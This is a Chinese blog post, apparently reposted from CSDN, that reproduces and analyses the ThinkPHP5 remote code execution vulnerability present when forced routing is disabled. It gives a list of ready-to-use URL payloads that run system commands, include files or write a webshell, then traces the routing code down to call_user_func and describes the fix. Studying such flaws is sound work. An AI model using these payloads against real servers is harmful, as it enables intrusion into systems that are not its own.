ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 编程语言> 文章详细

Thinkphp5未开启强制路由导致的RCE 漏洞复现与分析

2021-09-28 23:00:23  阅读:285  来源: 互联网

标签:index 跟进 vars Thinkphp5 system 复现 input RCE think


影响版本

  • 小于5.0.23
  • 小于5.1.30

5.0.x

?s=index/think\config/get&name=database.username # 获取配置信息
?s=index/\think\Lang/load&file=../../test.jpg    # 包含任意文件
?s=index/\think\Config/load&file=../../t.php     # 包含任意.php文件
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

5.1.x

?s=index/think\Request/input&filter[]=system&data=dir
?s=index/think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?> //这个payload我并没有成功
?s=index/think\Container/invokefunction&function=call_user_func&vars[]=system&vars[]=dir
?s=index/think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

本次复现使用payload:

http://127.0.0.1:8000/index.php?s=index/think\request/input?data=whoami&filter=system

thinkphp/library/think/App.php
run()方法中有个路由检测方法routeCheck(),跟进

在这里插入图片描述
首先会获取$path的值,跟进,进入path()方法
在这里插入图片描述$path的值为path()中的$pathinfo(),而$pathinfo的值由pathinfo()获取
在这里插入图片描述跟进pathinfo(),发现pathinfo的值就是我们传的s参数的值

在这里插入图片描述
然后回到routeCheck(),判断是否开启强制路由,不开启就是false,开启的话这个漏洞就不存在了
接着继续跟进,进入check()方法
这里会将/替换为|,然后返回
在这里插入图片描述
此时dispatch的值为index|think\request|input?data=whoami
在这里插入图片描述
然后跟进进入init()

在这里插入图片描述进入parseUrl()方法
其中有个parseUrlPath()会重新让|替换为/在这里插入图片描述

在这里插入图片描述
然后就是一系列的解析操作,封装后返回

在这里插入图片描述返回到init(),会创建一个Model对象,再返回到run()

在这里插入图片描述
继续跟进

在这里插入图片描述这里会执行exec()方法,跟进
在这里插入图片描述实例化了一个反射类ReflectionMethodReflectionMethod类报告了一个方法的有关信息
在这里插入图片描述
接着因为url_param_type默认值是0,所以执行$this->request->param()vars也就成功赋值
在这里插入图片描述
接着跟进invokeReflectMethod方法
在这里插入图片描述

绑定参数后通过反射方式调用了input()方法

在这里插入图片描述
跟进input()
在这里插入图片描述

最终调用filterValue()方法,执行里面的call_user_func并返回,完成了RCE
在这里插入图片描述自此,总算磕磕绊绊复现了一遍,原理其实就是没做好过滤,导致可以调用任意的控制器,官方的修复也很简单,对控制器的名字加了正则,没法再调用任意控制器了

修复

在这里插入图片描述
payload有好几种,有空再去看看其他几个

标签:index,跟进,vars,Thinkphp5,system,复现,input,RCE,think
来源: https://blog.csdn.net/xiaolong22333/article/details/120534532

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有